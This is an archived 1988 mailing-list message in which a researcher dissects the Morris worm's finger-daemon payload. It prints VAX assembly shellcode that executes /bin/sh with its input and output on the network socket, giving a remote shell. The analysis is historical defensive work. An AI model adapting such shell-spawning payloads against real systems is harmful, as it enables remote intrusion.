The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #022 [virus guts.] (1 message, 602 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/022.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Bill Sommerfeld <wesommer@ATHENA.MIT.EDU>
To: phage
Date: Fri 00:50:23 04/11/1988 EST
Subject: virus guts.
References: [Thread Prev: 021] [Thread Next: 024] [Message Prev: 021] [Message Next: 387]

The code which is inserted into finger is rather simple:

mcount+70:      pushl   $68732f		'/sh'
mcount+76:      pushl   $6e69622f	'/bin'
mcount+7c:      movl    sp,r10
mcount+7f:      pushl   $0
mcount+81:      pushl   $0
mcount+83:      pushl   r10
mcount+85:      pushl   $3
mcount+87:      movl    sp,ap
mcount+8a:      chmk    $3b		(execve)

For those of you who can't read vax assembler, this does up an "execve",
with no arguments, of /bin/sh; since this is run in the context of the
finger daemon, stdin and stdout are connected to the network socket...

From disassembling the code, it looks like the programmer is really
anally retentive about checking return codes, and, in addition,
prefers to use array indexing instead of pointers to walk through
arrays.

					- Bill

END OF DOCUMENT